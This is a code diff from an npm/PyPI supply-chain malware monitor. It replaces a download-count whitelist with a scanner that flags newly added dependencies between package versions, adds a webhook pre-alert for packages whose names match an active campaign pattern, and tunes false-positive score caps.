- TRUSTED_DEP_AGE_THRESHOLD_MS,
1155
1097
 
1156
1098
  // Tarball URL helpers
1157
1099
  getNpmTarballUrl,
@@ -1183,6 +1125,10 @@ module.exports = {
1183
1125
  pollPyPI,
1184
1126
  poll,
1185
1127
 
1128
+ // Active-campaign name watch (did-NNNN, etc.)
1129
+ CAMPAIGN_PATTERNS,
1130
+ matchCampaignPattern,
1131
+
1186
1132
  // Test seam — see _deps definition near the top of this file.
1187
1133
  _deps
1188
1134
  };
@@ -56,8 +56,6 @@ const {
56
56
  formatFindings,
57
57
  evaluateCacheTrigger,
58
58
  isFirstPublishHighRisk,
59
- POPULAR_THRESHOLD,
60
- downloadsCache: classifyDownloadsCache,
61
59
  DOWNLOADS_CACHE_TTL,
62
60
  HIGH_CONFIDENCE_MALICE_TYPES,
63
61
  IOC_MATCH_TYPES,
@@ -98,8 +96,8 @@ const {
98
96
  isSafeLifecycleScript
99
97
  } = require('./temporal.js');
100
98
 
101
- // From ./ingestion.js (will be created — currently in monitor.js)
102
- const { getNpmLatestTarball, getPyPITarballUrl, getWeeklyDownloads, checkTrustedDepDiff } = require('./ingestion.js');
99
+ // From ./ingestion.js
100
+ const { getNpmLatestTarball, getPyPITarballUrl } = require('./ingestion.js');
103
101
 
104
102
  // From ./tarball-archive.js
105
103
  const { archiveSuspectTarball } = require('./tarball-archive.js');
@@ -226,12 +224,15 @@ function countPackageFiles(dir) {
226
224
  *
227
225
  * @param {string} extractedDir - Path to extracted package
228
226
  * @param {number} timeoutMs - Timeout in milliseconds
227
+ * @param {object} [scanContext] - Monitor-side context spread into pipeline options.
228
+ * Required by opt-in scanners (e.g. trusted-dep-diff) that need name/version/ecosystem
229
+ * and a monitorMode flag to perform registry queries.
229
230
  * @returns {Promise<object>} Scan result (same shape as run(_, {_capture:true}))
230
231
  */
231
- function runScanInWorker(extractedDir, timeoutMs) {
232
+ function runScanInWorker(extractedDir, timeoutMs, scanContext = null) {
232
233
  return new Promise((resolve, reject) => {
233
234
  const worker = new Worker(SCAN_WORKER_PATH, {
234
- workerData: { extractedDir }
235
+ workerData: { extractedDir, scanContext: scanContext || {} }
235
236
  });
236
237
 
237
238
  let settled = false;
@@ -418,7 +419,19 @@ async function scanPackage(name, version, ecosystem, tarballUrl, registryMeta, s
418
419
 
419
420
  let result;
420
421
  try {
421
- result = await runScanInWorker(extractedDir, STATIC_SCAN_TIMEOUT_MS);
422
+ // scanContext: feeds monitor-side info (name/version/ecosystem) and the
423
+ // monitorMode + trustedDepDiff flags into opt-in pipeline scanners.
424
+ // The trusted-dep-diff scanner needs both name and version to query the
425
+ // registry for the previous-version dependency list — that information
426
+ // is meaningless in offline CLI mode but available here.
427
+ const scanContext = {
428
+ name,
429
+ version,
430
+ ecosystem,
431
+ monitorMode: true,
432
+ trustedDepDiff: true
433
+ };
434
+ result = await runScanInWorker(extractedDir, STATIC_SCAN_TIMEOUT_MS, scanContext);
422
435
  } catch (staticErr) {
423
436
  if (/static scan timeout/i.test(staticErr.message)) {
424
437
  console.error(`[MONITOR] STATIC_TIMEOUT: ${name}@${version} — exceeded ${STATIC_SCAN_TIMEOUT_MS / 1000}s (worker terminated)`);
@@ -542,40 +555,20 @@ async function scanPackage(name, version, ecosystem, tarballUrl, registryMeta, s
542
555
  recordTrainingSample(result, { name, version, ecosystem, label: 'clean', registryMeta: meta, unpackedSize: meta.unpackedSize, npmRegistryMeta, fileCountTotal, hasTests });
543
556
  return { sandboxResult: null, staticClean: true };
544
557
  } else {
545
- // Popularity pre-filter: skip sandbox for popular npm packages with only MEDIUM/LOW
546
- if (ecosystem === 'npm' && !hasIOCMatch(result) && !hasTyposquat(result) && !hasHighOrCritical(result)) {
547
- const downloads = await getWeeklyDownloads(name);
548
- if (downloads >= POPULAR_THRESHOLD) {
549
- // Dependency diff check: detect supply-chain injection on TRUSTED packages
550
- // (e.g., axios 1.14.0 1.14.1 adding unknown plain-crypto-js, 2026-03-30)
551
- const trustedFindings = await checkTrustedDepDiff(name, version);
552
- const hasCriticalDepFinding = trustedFindings.some(f => f.severity === 'CRITICAL');
553
-
554
- if (hasCriticalDepFinding) {
555
- // CRITICAL: unknown/new dependency — bypass TRUSTED, route to full scan + sandbox
556
- console.log(`[MONITOR] TRUSTED BYPASS: ${name}@${version} new unknown dependency detected, routing to full scan`);
557
- result.threats.push(...trustedFindings);
558
- for (const f of trustedFindings) {
559
- if (f.severity === 'CRITICAL') result.summary.critical = (result.summary.critical || 0) + 1;
560
- else if (f.severity === 'HIGH') result.summary.high = (result.summary.high || 0) + 1;
561
- }
562
- // Fall through to full classification below (do NOT return)
563
- } else {
564
- // No CRITICAL dep findings — normal TRUSTED skip (log HIGH findings if any)
565
- for (const f of trustedFindings) {
566
- console.log(`[MONITOR] TRUSTED dep change: ${f.message}`);
567
- }
568
- stats.scanned++;
569
- const elapsed = Date.now() - startTime;
570
- stats.totalTimeMs += elapsed;
571
- stats.clean++;
572
- console.log(`[MONITOR] TRUSTED (popular): ${name}@${version} (${Math.round(downloads / 1000)}k downloads/week, ${counts.join(', ')})`);
573
- updateScanStats('clean');
574
- recordTrainingSample(result, { name, version, ecosystem, label: 'clean', registryMeta: meta, unpackedSize: meta.unpackedSize, npmRegistryMeta, fileCountTotal, hasTests });
575
- return { sandboxResult: null, staticClean: true };
576
- }
577
- }
578
- }
558
+ // No popularity-based skip here. The TRUSTED (popular) shortcut that used
559
+ // to live at this point was a whitelist-by-downloads — CLAUDE.md forbids
560
+ // FP-reducing whitelists, and the Shai-Hulud wave-2 ATO attacks of May 2026
561
+ // proved that popular packages are precisely the prime target for ATO.
562
+ // Downstream attenuation handles the FP load via computeReputationFactor()
563
+ // and the graduated webhook threshold (webhook.js:83-87) — popular packages
564
+ // need a higher static score to fire a webhook, but they remain visible in
565
+ // the pipeline (sandbox, persisted detections, training samples) the same
566
+ // way every other package is. The supply-chain dep-diff check that the
567
+ // old block used as bypass logic now runs as a first-class scanner
568
+ // (src/scanner/trusted-dep-diff.js, wired in via executor.js); its findings
569
+ // arrive in result.threats before this point, so isSuspectClassification
570
+ // and the reputation bypass for HIGH_CONFIDENCE_MALICE_TYPES take the
571
+ // package straight to tier 1a + mandatory sandbox + webhook.
579
572
 
580
573
  const classification = isSuspectClassification(result);
581
574
  if (!classification.suspect) {
@@ -187,6 +187,41 @@ async function sendIOCPreAlert(name, version) {
187
187
  await sendWebhook(url, payload, { rawPayload: true });
188
188
  }
189
189
 
190
/**
 * Layer 1b: Send an immediate pre-alert webhook when a package name matches an
 * active-campaign pattern (e.g. `did-NNNN` in May 2026). Fires BEFORE tarball
 * download - IOC lists are eventually-consistent and lag the campaign by
 * hours to days, so name-pattern watch is the only signal available in real
 * time while the campaign is in flight.
 *
 * Does nothing when no webhook URL is configured. A rejection from
 * sendWebhook propagates to the caller.
 *
 * @param {string} name - Package name that matched the campaign pattern
 * @param {string} campaign - Short campaign label (e.g. 'did-NNNN')
 * @param {string} [detection='Changes stream pre-scan'] - Text for the
 *   "Detection" field. Callers on another ingestion path (e.g. the RSS
 *   fallback) can pass their own label so the alert names the real source.
 * @returns {Promise<void>}
 */
async function sendCampaignPreAlert(name, campaign, detection = 'Changes stream pre-scan') {
  const url = getWebhookUrl();
  if (!url) return;

  const npmLink = `https://www.npmjs.com/package/${encodeURIComponent(name)}`;

  // One instant feeds both the footer text and the embed timestamp so the two
  // can never disagree.
  const isoNow = new Date().toISOString();
  const footerStamp = isoNow.replace('T', ' ').replace(/\.\d+Z$/, ' UTC');

  const payload = {
    embeds: [{
      title: '\u26a0\ufe0f CAMPAIGN PRE-ALERT \u2014 Suspected Active Campaign',
      color: 0xe67e22,
      fields: [
        { name: 'Package', value: `[${name}](${npmLink})`, inline: true },
        { name: 'Source', value: `Name pattern: ${campaign}`, inline: true },
        { name: 'Detection', value: detection, inline: true },
        { name: 'Status', value: 'Suspected campaign publication \u2014 not yet confirmed malicious. Full scan queued; treat as suspect until verdict lands.', inline: false }
      ],
      footer: {
        text: `MUAD'DIB Campaign Pre-Alert | ${footerStamp}`
      },
      timestamp: isoNow
    }]
  };

  await sendWebhook(url, payload, { rawPayload: true });
}
224
+
190
225
  /**
191
226
  * Check if a specific package@version matches a versioned IOC entry.
192
227
  * Returns the matching IOC entry or null.
@@ -1172,6 +1207,7 @@ module.exports = {
1172
1207
  shouldSendWebhook,
1173
1208
  buildMonitorWebhookPayload,
1174
1209
  sendIOCPreAlert,
1210
+ sendCampaignPreAlert,
1175
1211
  matchVersionedIOC,
1176
1212
  computeRiskLevel,
1177
1213
  computeRiskScore,
@@ -10,6 +10,7 @@ const { scanIocStrings } = require('../scanner/ioc-strings.js');
10
10
  const { scanAntiForensic } = require('../scanner/anti-forensic.js');
11
11
  const { scanStubPackage } = require('../scanner/stub-package.js');
12
12
  const { scanMonorepo } = require('../scanner/monorepo.js');
13
+ const { scanTrustedDepDiff } = require('../scanner/trusted-dep-diff.js');
13
14
  const { analyzeDataFlow } = require('../scanner/dataflow.js');
14
15
  const { scanTyposquatting, findPyPITyposquatMatch } = require('../scanner/typosquat.js');
15
16
  const { scanGitHubActions } = require('../scanner/github-actions.js');
@@ -201,7 +202,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
201
202
  'scanDependencies', 'scanHashes', 'analyzeDataFlow', 'scanTyposquatting',
202
203
  'scanGitHubActions', 'matchPythonIOCs', 'checkPyPITyposquatting',
203
204
  'scanEntropy', 'scanAIConfig', 'scanIocStrings', 'scanAntiForensic',
204
- 'scanStubPackage', 'scanMonorepo'
205
+ 'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff'
205
206
  ];
206
207
 
207
208
  const settledResults = await Promise.allSettled([
@@ -221,7 +222,13 @@ async function execute(targetPath, options, pythonDeps, warnings) {
221
222
  yieldThen(() => scanIocStrings(targetPath)),
222
223
  withTimeout(() => scanAntiForensic(targetPath), 'scanAntiForensic'),
223
224
  yieldThen(() => scanStubPackage(targetPath)),
224
- yieldThen(() => scanMonorepo(targetPath))
225
+ yieldThen(() => scanMonorepo(targetPath)),
226
+ // Opt-in scanner — short-circuits to [] unless options.trustedDepDiff or
227
+ // options.monitorMode is set. CLI runs without flags pay no cost (no I/O).
228
+ // Wrapped in withTimeout as defense in depth: scanner has its own 10s + 5s × N
229
+ // internal timeouts, but a registry slowdown with many added deps could exceed
230
+ // the static-scan budget without this cap.
231
+ withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff')
225
232
  ]);
226
233
 
227
234
  // Extract results: use empty array for rejected scanners, log errors
@@ -250,7 +257,8 @@ async function execute(targetPath, options, pythonDeps, warnings) {
250
257
  iocStringThreats,
251
258
  antiForensicThreats,
252
259
  stubPackageThreats,
253
- monorepoThreats
260
+ monorepoThreats,
261
+ trustedDepDiffThreats
254
262
  ] = scanResult;
255
263
 
256
264
  // Emit warning if file count cap was hit + quick-scan overflow files
@@ -330,6 +338,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
330
338
  ...antiForensicThreats,
331
339
  ...stubPackageThreats,
332
340
  ...monorepoThreats,
341
+ ...trustedDepDiffThreats,
333
342
  ...crossFileFlows.filter(f => f && f.sourceFile && f.sinkFile).map(f => ({
334
343
  type: f.type,
335
344
  severity: f.severity,
@@ -23,7 +23,12 @@ const { run } = require('../index.js');
23
23
 
24
24
  (async () => {
25
25
  try {
26
- const result = await run(workerData.extractedDir, { _capture: true });
26
+ // scanContext (optional) carries monitor-side info that opt-in scanners need
27
+ // (e.g. trusted-dep-diff requires package name + version to query the registry).
28
+ // It is spread INTO the pipeline options, but `_capture: true` always wins so
29
+ // the worker keeps returning the result object — never prints.
30
+ const scanContext = workerData.scanContext || {};
31
+ const result = await run(workerData.extractedDir, { ...scanContext, _capture: true });
27
32
  parentPort.postMessage({ type: 'result', data: result });
28
33
  } catch (err) {
29
34
  parentPort.postMessage({ type: 'error', message: err.message || String(err) });
@@ -0,0 +1,205 @@
1
+ 'use strict';
2
+
3
+ /**
4
+ * Trusted dep-diff scanner — detects supply-chain injection via NEW dependencies
5
+ * added between two adjacent published versions of an npm package.
6
+ *
7
+ * Threat model: a compromised maintainer account publishes a patch bump that
8
+ * silently introduces a fresh (or unknown-aged) dependency carrying the actual
9
+ * payload. Reference incident: axios 1.14.0 → 1.14.1 adding `plain-crypto-js`
10
+ * on 2026-03-30. The hostile dep is short-aged and unrecognised, but the host
11
+ * package itself is reputable, so popularity-based filters miss it.
12
+ *
13
+ * Opt-in by design: the scanner needs registry I/O for the previous version's
14
+ * dependency list, which is meaningless for offline CLI audits of a frozen
15
+ * node_modules. It only runs when explicitly enabled via
16
+ * options.trustedDepDiff === true OR
17
+ * options.monitorMode === true
18
+ * The monitor pipeline sets both via the worker thread context.
19
+ *
20
+ * Findings emitted (rule IDs already registered in src/rules/index.js:2598-2621):
21
+ * - trusted_new_unknown_dependency (CRITICAL) — added dep < 7d old OR age unknown
22
+ * - trusted_new_dependency (HIGH) — added dep ≥ 7d old
23
+ *
24
+ * Both types are in HIGH_CONFIDENCE_MALICE_TYPES (classify.js:60), which means
25
+ * downstream reputation attenuation is bypassed — the finding's severity reaches
26
+ * the webhook decision uncapped.
27
+ */
28
+
29
+ const fs = require('fs');
30
+ const path = require('path');
31
+ const https = require('https');
32
+
33
+ const TRUSTED_DEP_AGE_THRESHOLD_MS = 7 * 24 * 60 * 60 * 1000; // 7 days
34
+
35
+ const PACKUMENT_TIMEOUT_MS = 10_000;
36
+ const DEP_AGE_TIMEOUT_MS = 5_000;
37
+
38
/**
 * Minimal HTTPS GET that resolves with the response body decoded as UTF-8.
 *
 * Local copy (not shared with monitor/ingestion.js) to keep the scanner
 * self-contained — the monitor module pulls this scanner, not the reverse.
 *
 * Redirects (301, 302, 303, 307, 308) are followed for at most `redirectsLeft`
 * hops, and a relative `Location` header is resolved against the URL that
 * produced it. Any other non-2xx status rejects with `HTTP <status> for <url>`.
 *
 * @param {string} url - Absolute https URL to fetch
 * @param {number} [timeoutMs=30000] - Passed as the request `timeout` option;
 *   when the request emits 'timeout' it is destroyed and the promise rejects
 * @param {number} [redirectsLeft=5] - Redirect hops still allowed
 * @returns {Promise<string>} Response body
 */
function httpsGet(url, timeoutMs = 30_000, redirectsLeft = 5) {
  return new Promise((resolve, reject) => {
    const req = https.get(url, { timeout: timeoutMs }, (res) => {
      const status = res.statusCode;
      const isRedirect = status === 301 || status === 302 || status === 303 ||
        status === 307 || status === 308;

      if (isRedirect) {
        res.resume(); // drain so the socket is released
        const location = res.headers.location;
        if (!location) return reject(new Error(`Redirect without Location for ${url}`));
        // Cap the chain: a redirect loop must not recurse forever.
        if (redirectsLeft <= 0) return reject(new Error(`Too many redirects for ${url}`));
        let nextUrl;
        try {
          // Location may be relative; resolve it against the current URL.
          // Parsed inside try/catch because this callback runs outside the
          // promise executor, so a throw here would be an uncaught exception.
          nextUrl = new URL(location, url).toString();
        } catch {
          return reject(new Error(`Invalid redirect Location for ${url}`));
        }
        return httpsGet(nextUrl, timeoutMs, redirectsLeft - 1).then(resolve, reject);
      }

      if (status < 200 || status >= 300) {
        res.resume();
        return reject(new Error(`HTTP ${status} for ${url}`));
      }

      const chunks = [];
      res.on('data', (chunk) => chunks.push(chunk));
      res.on('end', () => resolve(Buffer.concat(chunks).toString('utf8')));
      res.on('error', reject);
    });
    req.on('error', reject);
    req.on('timeout', () => {
      req.destroy();
      reject(new Error(`Timeout for ${url}`));
    });
  });
}
68
+
69
/**
 * Look up how long ago a dependency was first published.
 *
 * @param {string} dep - Dependency package name
 * @returns {Promise<number|null>} Age in milliseconds, or null when the
 *   registry lookup fails or `time.created` is missing or unparseable
 */
async function fetchDepAgeMs(dep) {
  try {
    const depBody = await httpsGet(`https://registry.npmjs.org/${encodeURIComponent(dep)}`, DEP_AGE_TIMEOUT_MS);
    const depData = JSON.parse(depBody);
    const created = depData.time && depData.time.created;
    if (!created) return null;
    const createdMs = new Date(created).getTime();
    // An unparseable date yields NaN; report it as "unknown" so the caller
    // escalates instead of silently treating the dependency as old.
    return Number.isNaN(createdMs) ? null : Date.now() - createdMs;
  } catch (err) {
    console.log(`[SCANNER] trusted-dep-diff: could not check age of dependency ${dep}: ${err.message}`);
    return null;
  }
}

/**
 * Build the finding for one added dependency.
 * Unknown age or age below TRUSTED_DEP_AGE_THRESHOLD_MS → CRITICAL; otherwise HIGH.
 *
 * @param {string} name - Host package name
 * @param {string} dep - Added dependency name
 * @param {number|null} ageMs - Dependency age in ms, null when unknown
 * @param {string} prevVersion - Version published immediately before newVersion
 * @param {string} newVersion - Version under scan
 * @returns {object} Finding object
 */
function buildDepFinding(name, dep, ageMs, prevVersion, newVersion) {
  if (ageMs === null || ageMs < TRUSTED_DEP_AGE_THRESHOLD_MS) {
    const ageDays = ageMs !== null ? Math.floor(ageMs / 86400000) : 'unknown';
    return {
      type: 'trusted_new_unknown_dependency',
      severity: 'CRITICAL',
      confidence: ageMs === null ? 'medium' : 'high',
      file: 'package.json',
      message: `TRUSTED package ${name} added unknown dependency ${dep} (age: ${ageDays}d) in version ${prevVersion} → ${newVersion}`,
      rule_id: 'MUADDIB-TRUSTED-001',
      mitre: 'T1195.002',
      dep,
      depAgeDays: ageDays,
      prevVersion,
      newVersion
    };
  }

  const ageDays = Math.floor(ageMs / 86400000);
  return {
    type: 'trusted_new_dependency',
    severity: 'HIGH',
    confidence: 'medium',
    file: 'package.json',
    message: `TRUSTED package ${name} added new dependency ${dep} (age: ${ageDays}d) in version ${prevVersion} → ${newVersion}`,
    rule_id: 'MUADDIB-TRUSTED-002',
    mitre: 'T1195.002',
    dep,
    depAgeDays: ageDays,
    prevVersion,
    newVersion
  };
}

/**
 * Core dep-diff logic: fetch the packument for `name`, find the version
 * published immediately before `newVersion` (ordered by publish time), and
 * emit one finding per key in `dependencies` that the previous version lacked.
 *
 * Findings shape, rule_ids, severity mapping and the 7-day cutoff match the
 * implementation previously in monitor/ingestion.js#checkTrustedDepDiff, with
 * two hardening changes:
 *   - added deps are detected with an own-property check, so a dependency
 *     whose name collides with an Object.prototype member (e.g. `constructor`)
 *     is no longer invisible;
 *   - an unparseable `time.created` is treated as unknown age (CRITICAL)
 *     rather than being reported as HIGH with a NaN age.
 *
 * @param {string} name - Package name
 * @param {string} newVersion - Newly published version
 * @returns {Promise<Array>} findings (empty on error, first version, unknown
 *   version, or no new deps)
 */
async function checkDepDiff(name, newVersion) {
  const findings = [];
  try {
    const body = await httpsGet(`https://registry.npmjs.org/${encodeURIComponent(name)}`, PACKUMENT_TIMEOUT_MS);
    const packument = JSON.parse(body);

    if (!packument.versions || !packument.time) return findings;

    // Sort versions by publish time (not semver — handles prereleases correctly)
    const timeMap = packument.time;
    const versionKeys = Object.keys(packument.versions)
      .filter(v => timeMap[v])
      .sort((a, b) => new Date(timeMap[a]) - new Date(timeMap[b]));

    const newIdx = versionKeys.indexOf(newVersion);
    if (newIdx <= 0) return findings; // First version or not found

    const prevVersion = versionKeys[newIdx - 1];

    const prevDeps = (packument.versions[prevVersion] && packument.versions[prevVersion].dependencies) || {};
    const newDeps = (packument.versions[newVersion] && packument.versions[newVersion].dependencies) || {};

    // Own-property check: `in` would also match inherited Object.prototype keys.
    const hadDep = dep => Object.prototype.hasOwnProperty.call(prevDeps, dep);
    const addedDeps = Object.keys(newDeps).filter(dep => !hadDep(dep));
    if (addedDeps.length === 0) return findings;

    console.log(`[SCANNER] trusted-dep-diff: ${name} ${prevVersion} → ${newVersion}: +${addedDeps.length} new dep(s): ${addedDeps.join(', ')}`);

    for (const dep of addedDeps) {
      const ageMs = await fetchDepAgeMs(dep);
      findings.push(buildDepFinding(name, dep, ageMs, prevVersion, newVersion));
    }

    return findings;
  } catch (err) {
    console.log(`[SCANNER] trusted-dep-diff: check failed for ${name}@${newVersion}: ${err.message}`);
    return findings;
  }
}
159
+
160
/**
 * Pipeline entry point. Called by src/pipeline/executor.js alongside the other
 * scanners (Promise.allSettled). Gated by an explicit opt-in option to keep
 * CLI audits offline-safe: without a flag it returns [] before any I/O.
 *
 * When name or version is not supplied through options, the missing value is
 * read from <targetPath>/package.json. A missing, unreadable, unparseable or
 * non-object manifest yields [], as does a name or version that is not a
 * non-empty string.
 *
 * @param {string} targetPath - Extracted package directory
 * @param {object} options - Pipeline options. Honors:
 *   - options.trustedDepDiff - explicit opt-in (preferred)
 *   - options.monitorMode    - opt-in for the monitor daemon path
 *   - options.name           - package name override (avoids re-reading package.json)
 *   - options.version        - version override
 *   - options.ecosystem      - 'npm' | 'pypi' | ... — scanner is npm-only
 * @returns {Promise<Array>} findings array
 */
async function scanTrustedDepDiff(targetPath, options = {}) {
  // A default parameter only covers undefined; tolerate an explicit null too.
  const opts = options || {};
  if (!opts.trustedDepDiff && !opts.monitorMode) return [];
  if (opts.ecosystem && opts.ecosystem !== 'npm') return [];

  let name = opts.name || null;
  let version = opts.version || null;

  if (!name || !version) {
    let pkg;
    try {
      // A missing file throws ENOENT here and is handled like any other
      // unreadable manifest.
      pkg = JSON.parse(fs.readFileSync(path.join(targetPath, 'package.json'), 'utf8'));
    } catch {
      return [];
    }
    // JSON.parse can legally return null or a primitive; only an object can
    // carry name/version.
    if (pkg === null || typeof pkg !== 'object') return [];
    name = name || pkg.name;
    version = version || pkg.version;
  }

  // Both values are interpolated into a registry URL / compared against
  // packument keys, so anything other than a non-empty string is unusable.
  if (typeof name !== 'string' || typeof version !== 'string' || !name || !version) return [];

  return await checkDepDiff(name, version);
}
198
+
199
+ module.exports = {
200
+ scanTrustedDepDiff,
201
+ checkDepDiff,
202
+ // Backwards-compat alias for existing tests imported from monitor/ingestion.js
203
+ checkTrustedDepDiff: checkDepDiff,
204
+ TRUSTED_DEP_AGE_THRESHOLD_MS
205
+ };
package/src/scoring.js CHANGED
@@ -1485,6 +1485,9 @@ const {
1485
1485
  placeholderAntiDepConfusion,
1486
1486
  mcpServerEnvAccess,
1487
1487
  vendorCliSdk,
1488
+ aiAgentBot,
1489
+ vendorMinifiedBundle,
1490
+ typosquatBenignLifecycle,
1488
1491
  } = require('./ml/feature-extractor.js');
1489
1492
 
1490
1493
  /**
@@ -1519,6 +1522,13 @@ function applyContextualFPCaps(result, pkgMeta) {
1519
1522
  if (bundleWithoutInstallScripts(result, meta)) {
1520
1523
  applied.push({ feature: 'bundle_without_install_scripts', cap: 30 });
1521
1524
  }
1525
+ // F12: vendor minified bundle cascade (>=3 CASCADE_TYPES on a single
1526
+ // bundle file, no lifecycle, no veto) → MAX 25. Targets the v2.11.27
1527
+ // weekly review cluster (@photoroom/ui, @vkontakte/videoplayer-shared).
1528
+ // Tighter than F1 because the cascade is a stronger structural signature.
1529
+ if (vendorMinifiedBundle(result, meta)) {
1530
+ applied.push({ feature: 'vendor_minified_bundle', cap: 25 });
1531
+ }
1522
1532
  // F3: credential destination first-party API → MAX 30
1523
1533
  if (networkDestinationFirstParty(result, meta)) {
1524
1534
  applied.push({ feature: 'network_destination_first_party', cap: 30 });
@@ -1543,10 +1553,22 @@ function applyContextualFPCaps(result, pkgMeta) {
1543
1553
  if (vendorCliSdk(result, meta)) {
1544
1554
  applied.push({ feature: 'vendor_cli_sdk', cap: 35 });
1545
1555
  }
1556
+ // F11: legit AI agent / bot / multi-LLM orchestrator → MAX 35
1557
+ if (aiAgentBot(result, meta)) {
1558
+ applied.push({ feature: 'ai_agent_bot', cap: 35 });
1559
+ }
1546
1560
  // F5: typosquat on scoped package → suppress typosquat points
1547
1561
  if (typosquatScopedPackage(result, meta)) {
1548
1562
  applied.push({ feature: 'typosquat_scoped_package', cap: -1 });
1549
1563
  }
1564
+ // F13: boundary-squat dep + provably benign lifecycle (husky install,
1565
+ // npm run build, patches/apply-patches) → MAX 30. Targets the v2.11.28
1566
+ // weekly review cluster (@doyourjob/gravity-ui-page-constructor,
1567
+ // magmastream, balena-cli, @1d1s/design-system, etc.). Vetoes on any
1568
+ // exfil signal, IOC hit, or Axios UNC1069 dep-usage compound.
1569
+ if (typosquatBenignLifecycle(result, meta)) {
1570
+ applied.push({ feature: 'typosquat_benign_lifecycle', cap: 30 });
1571
+ }
1550
1572
 
1551
1573
  if (applied.length === 0) return applied;
1552
1574